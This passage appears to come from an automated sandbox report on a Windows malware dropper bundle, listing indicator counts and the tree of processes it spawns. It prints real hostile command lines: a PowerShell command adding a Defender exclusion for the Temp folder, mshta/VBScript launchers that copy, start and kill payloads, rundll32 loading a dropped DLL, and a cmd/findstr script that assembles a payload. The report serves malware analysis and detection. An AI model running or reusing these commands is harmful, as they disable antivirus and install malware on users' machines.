504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe 504 WerFault.exe -
Suspicious use of SendNotifyMessage 34 IoCs
Processes:
Adorarti.exe.comAdorarti.exe.comWerFault.exeRimasta.exe.comRimasta.exe.comRimasta.exe.comRimasta.exe.commsedge.exeCleaner.exeTutti.exe.comTutti.exe.compid process 5896 Adorarti.exe.com 5896 Adorarti.exe.com 5896 Adorarti.exe.com 4232 Adorarti.exe.com 4232 Adorarti.exe.com 4232 Adorarti.exe.com 6544 WerFault.exe 6544 WerFault.exe 6544 WerFault.exe 6308 Rimasta.exe.com 6308 Rimasta.exe.com 6308 Rimasta.exe.com 6780 Rimasta.exe.com 6780 Rimasta.exe.com 6780 Rimasta.exe.com 5580 Rimasta.exe.com 5580 Rimasta.exe.com 5580 Rimasta.exe.com 6800 Rimasta.exe.com 6800 Rimasta.exe.com 6800 Rimasta.exe.com 5332 msedge.exe 5332 msedge.exe 6520 Cleaner.exe 6520 Cleaner.exe 6520 Cleaner.exe 6520 Cleaner.exe 6520 Cleaner.exe 4320 Tutti.exe.com 4320 Tutti.exe.com 4320 Tutti.exe.com 2044 Tutti.exe.com 2044 Tutti.exe.com 2044 Tutti.exe.com -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
cmd.exeMaskVPNUpdate.exepid process 5684 cmd.exe 3268 MaskVPNUpdate.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4952 wrote to memory of 4932 4952 setup_x86_x64_install.exe setup_installer.exe PID 4952 wrote to memory of 4932 4952 setup_x86_x64_install.exe setup_installer.exe PID 4952 wrote to memory of 4932 4952 setup_x86_x64_install.exe setup_installer.exe PID 4932 wrote to memory of 5056 4932 setup_installer.exe setup_install.exe PID 4932 wrote to memory of 5056 4932 setup_installer.exe setup_install.exe PID 4932 wrote to memory of 5056 4932 setup_installer.exe setup_install.exe PID 5056 wrote to memory of 716 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 716 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 716 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 2520 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 2520 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 2520 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 988 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 988 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 988 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 4376 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 4376 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 4376 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 2028 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 2028 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 2028 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 5036 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 5036 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 5036 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 4528 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 4528 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 4528 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 784 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 784 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 784 5056 setup_install.exe cmd.exe PID 716 wrote to memory of 4936 716 cmd.exe powershell.exe PID 716 wrote to memory of 4936 716 cmd.exe powershell.exe PID 716 wrote to memory of 4936 716 cmd.exe powershell.exe PID 5056 wrote to memory of 3336 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3336 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3336 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3600 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3600 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 3600 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 4952 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 4952 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 4952 5056 setup_install.exe cmd.exe PID 2520 wrote to memory of 1016 2520 cmd.exe Thu219d5fe8cf316.exe PID 2520 wrote to memory of 1016 2520 cmd.exe Thu219d5fe8cf316.exe PID 988 wrote to memory of 456 988 cmd.exe Thu21624565bb917a.exe PID 988 wrote to memory of 456 988 cmd.exe Thu21624565bb917a.exe PID 988 wrote to memory of 456 988 cmd.exe Thu21624565bb917a.exe PID 5056 wrote to memory of 1040 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 1040 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 1040 5056 setup_install.exe cmd.exe PID 4528 wrote to memory of 1076 4528 cmd.exe Thu21b9847cb6727.exe PID 4528 wrote to memory of 1076 4528 cmd.exe Thu21b9847cb6727.exe PID 2028 wrote to memory of 1132 2028 cmd.exe Thu2164f292a11ce.exe PID 2028 wrote to memory of 1132 2028 cmd.exe Thu2164f292a11ce.exe PID 2028 wrote to memory of 1132 2028 cmd.exe Thu2164f292a11ce.exe PID 5056 wrote to memory of 1192 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 1192 5056 setup_install.exe cmd.exe PID 5056 wrote to memory of 1192 5056 setup_install.exe cmd.exe PID 4376 wrote to memory of 1404 4376 cmd.exe Thu21a1ef054cac78a.exe PID 4376 wrote to memory of 1404 4376 cmd.exe Thu21a1ef054cac78a.exe PID 4376 wrote to memory of 1404 4376 cmd.exe Thu21a1ef054cac78a.exe PID 5036 wrote to memory of 4600 5036 cmd.exe Thu21b93295136197.exe PID 5036 wrote to memory of 4600 5036 cmd.exe Thu21b93295136197.exe PID 5036 wrote to memory of 4600 5036 cmd.exe Thu21b93295136197.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu219d5fe8cf316.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu219d5fe8cf316.exeThu219d5fe8cf316.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\4205929.exe"C:\ProgramData\4205929.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5524 -s 22927⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\8536432.exe"C:\ProgramData\8536432.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\4790483.exe"C:\ProgramData\4790483.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCript:cloSe (crEateoBjECt("WscRipT.ShelL"). ruN( "cMD.EXE /c cOPY /Y ""C:\ProgramData\4790483.exe"" T2qzzHJjB1IL.eXe&& START T2QzzhJjB1IL.ExE /PcFM2d8NWvl_DASq10FK9czyFRU& iF """" == """" for %a in (""C:\ProgramData\4790483.exe"" ) do taskkill /im ""%~Nxa"" -f ",0, TRUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cOPY /Y "C:\ProgramData\4790483.exe" T2qzzHJjB1IL.eXe&&START T2QzzhJjB1IL.ExE /PcFM2d8NWvl_DASq10FK9czyFRU&iF ""== "" for %a in ("C:\ProgramData\4790483.exe" ) do taskkill /im "%~Nxa" -f8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\T2qzzHJjB1IL.eXeT2QzzhJjB1IL.ExE /PcFM2d8NWvl_DASq10FK9czyFRU9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCript:cloSe (crEateoBjECt("WscRipT.ShelL"). ruN( "cMD.EXE /c cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\T2qzzHJjB1IL.eXe"" T2qzzHJjB1IL.eXe&& START T2QzzhJjB1IL.ExE /PcFM2d8NWvl_DASq10FK9czyFRU& iF ""/PcFM2d8NWvl_DASq10FK9czyFRU"" == """" for %a in (""C:\Users\Admin\AppData\Local\Temp\T2qzzHJjB1IL.eXe"" ) do taskkill /im ""%~Nxa"" -f ",0, TRUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cOPY /Y "C:\Users\Admin\AppData\Local\Temp\T2qzzHJjB1IL.eXe" T2qzzHJjB1IL.eXe&&START T2QzzhJjB1IL.ExE /PcFM2d8NWvl_DASq10FK9czyFRU&iF "/PcFM2d8NWvl_DASq10FK9czyFRU"== "" for %a in ("C:\Users\Admin\AppData\Local\Temp\T2qzzHJjB1IL.eXe" ) do taskkill /im "%~Nxa" -f11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\2vB7M.hGv,TVfKbQAhkK10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "4790483.exe" -f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2164f292a11ce.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu2164f292a11ce.exeThu2164f292a11ce.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1132 -s 3006⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b93295136197.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu21b93295136197.exeThu21b93295136197.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-CH4LQ.tmp\Thu21b93295136197.tmp"C:\Users\Admin\AppData\Local\Temp\is-CH4LQ.tmp\Thu21b93295136197.tmp" /SL5="$2014E,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS443F3EF3\Thu21b93295136197.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-H8378.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-H8378.tmp\Setup.exe" /Verysilent7⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplis.ru/1S2Qs78⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffcad2346f8,0x7ffcad234708,0x7ffcad2347189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:29⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:39⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2648 /prefetch:89⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1784 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3008 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3852 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5076 /prefetch:29⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2984 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6676 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6260 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,9614940858225463406,2636295354357757532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6952 /prefetch:19⤵
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"8⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BSKR.exe"C:\Users\Admin\AppData\Local\Temp\BSKR.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\BSKR.exeC:\Users\Admin\AppData\Local\Temp\BSKR.exe10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Mortician.exe"C:\Users\Admin\AppData\Local\Temp\Mortician.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c cmd < Cerchia.vsdx10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd11⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx12⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comImpedire.exe.com I12⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I13⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I14⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I15⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I16⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I17⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I18⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I19⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I20⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I21⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I23⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost12⤵
- Runs ping.exe
-
